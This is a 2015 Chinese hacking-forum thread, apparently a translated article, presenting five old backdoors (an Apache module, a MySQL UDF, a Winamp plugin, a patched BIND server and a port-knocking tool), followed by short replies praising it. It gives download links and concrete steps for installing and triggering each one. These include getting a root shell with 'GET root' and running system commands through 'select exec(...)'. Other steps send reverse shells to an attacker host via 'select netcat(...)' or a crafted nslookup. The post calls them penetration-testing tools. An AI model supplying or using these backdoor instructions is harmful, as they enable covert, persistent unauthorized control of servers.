查看: 126754|回复: 393

[工具专区] 老式后门之美:五种复古远程控制工具(含下载)

[复制链接]
  • TA的每日心情
    慵懒
    2024-12-2 09:11
  • 签到天数: 919 天

    [LV.10]以坛为家III

    发表于 2015-9-12 19:55:13 | 显示全部楼层 |阅读模式
    目前,高级的rootkit技术可以帮助你在渗透中拿到一个shell后进行持久性控制。此外,还有供应商故意提供了一些植入后门,但那就是截然不同的故事了。尽管各式花样翻新的技术与代码层出不穷,可你还记得曾经用过的那些后门吗?

    本文介绍了5种远程控制工具(Remote Administration Tools)RAT ,又称“后门”,这完全是根据作者个人喜好挑选的。这是我进行合法渗透测试时所使用的工具,它们对于验证渗透的持久性与测量防御手段的有效性提供了重要的帮助。

    1.mod_rootme——Apache模块后门(2004)

    “mod_rootme是一个非常酷的模块,它可以在Apache中安装一个后门,你只需要进行一个简单的GET请求,就可以拿到一个root权限的shell,并且在系统中没有任何日志记录。”
    作为最著名的工具之一,你只需要执行一个简单的make命令来编译共享库,将它复制到模块目录,在httpd.conf中写入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后使用‘apachetl stop;apachectl start’重启httpd后台进程。之后,通过“GET root”命令你就得到了一个root权限的shell。

    下载:https://packetstormsecurity.com/ ... rootme-0.3.tgz.html

    2.raptor_winudf.sql —— MySQL UDF后门(2004-2006)

    “这是一个基于UDF(用户定义函数)机制的MySQL后门工具。可以用它来产生一个反弹shell(netcat UDF监听80端口)或者执行一条系统命令(exec UDF)。”
    对于这个后门,你可以使用一个简单的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’将后门作为一个用户定义函数注入到MySQL中。这样你便可以从MySQL shell执行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。

    这个反弹shell实现了一个有趣的功能,可以使用命令‘mysql> select netcat('y.y.y.y');’来调用,之后就会发送一个交互式shell在指定的主机(y.y.y.y)的80端口上。

    下载 (Win32): http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

    下载 (Linux): http://www.0xdeadbeef.info/exploits/raptor_udf2.c
    3. get_wbkdr.dll插件——Winamp播放器后门(2006)

    “wbkdr是非常著名的高保真音乐播放器软件Winamp后门的一个POC,它利用了插件接口,在24501端口中调用cmd.exe。”
    下载:https://packetstormsecurity.com/files/53268/wbkdr.zip.html


    4.BIND反弹shell后门(2005)

    BIND是世界上最流行的DNS服务器软件之一。这个后门使用了BIND未发布的补丁,是我的一个来自阿根廷的朋友开发的。基本上,需要你以root用户的身份来打补丁、编译以及运行服务。一旦运行,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 发送一个DNS请求,将会在主机x.x.x.x的给定端口上触发一个反弹shell。

    5.Knock-out—— 基于端口敲门(port-knocking)的后门

    这是我使用数据包嗅探库libpcap(服务器)和数据包构造库libnet(客户端)制作的后门。我运用了端口敲门技术,它可以是一个绑定端口的shell也可以是一个反弹型的shell。服务器与客户端使用相同的配置文件来决定使用哪些端口以及发送每个网络包时间所需要的时间差。Knock-out支持TCP和UDP,并且最近在Linux主机中仍然可以工作(测试系统Ubuntu Server 14.04)。

    下载:https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html

    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-9-12 20:15:52 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-12 22:31:08 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-13 00:55:22 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-13 05:38:22 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-9-13 11:43:23 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-13 18:16:05 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-14 12:24:47 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-14 16:06:07 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-14 21:07:22 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 15:35 , Processed in 0.042055 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部